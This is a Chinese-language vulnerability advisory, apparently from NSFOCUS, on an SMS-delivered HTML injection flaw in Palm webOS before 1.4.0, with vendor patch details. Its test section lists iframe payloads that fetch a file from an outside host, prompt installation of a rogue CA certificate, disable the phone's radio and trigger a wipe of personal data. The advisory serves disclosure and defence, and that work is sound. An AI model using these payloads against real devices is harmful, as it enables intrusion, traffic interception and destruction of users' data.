安全研究

安全漏洞
Palm WebOS短信查看脚本注入漏洞

发布日期:2010-04-16
更新日期:2010-04-27

受影响系统:
Palm webOS < 1.4.0
不受影响系统:
Palm webOS 1.4.0
描述:
BUGTRAQ  ID: 39678

Palm WebOS是Palm系列手机所使用的操作系统。

Palm WebOS的短信客户端没有执行正确地输入过滤,远程攻击者可以通过向手机发送包含有恶意HTML内容的短信导致注入并执行恶意代码,完全入侵用户手机。

<*来源:D1AB1069
  
  链接:http://secunia.com/advisories/39518/
        http://intrepidusgroup.com/insight/2010/04/webos-examples-of-sms-delivered-injection-flaws/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

打开web浏览器并指向google.com
<iframe src='http://www.google.com'<>>

开始下载文件
<iframe src='http://webos.ath.cx:50050/bad.doc'<>>

播放在线视频
<iframe src='http://www.archive.org/download/Peanut_Butter_Jelly_Time/pbj_512kb.mp4'<>>

要求用户安装新的CA根证书
<iframe src='http://rajweb.net/ubercert.crt'<>>

关闭手机的广播
<iframe src='tel:#*#633#'<>>

要求用户进入演示模式,清除所有个人数据
<iframe src='tel:#*#3366#'<>>

建议:
厂商补丁:

Palm
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://kb.palm.com/wps/portal/kb/na/pre/p100eww/sprint/solutions/article/50607_en.html#140

浏览次数:2252
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障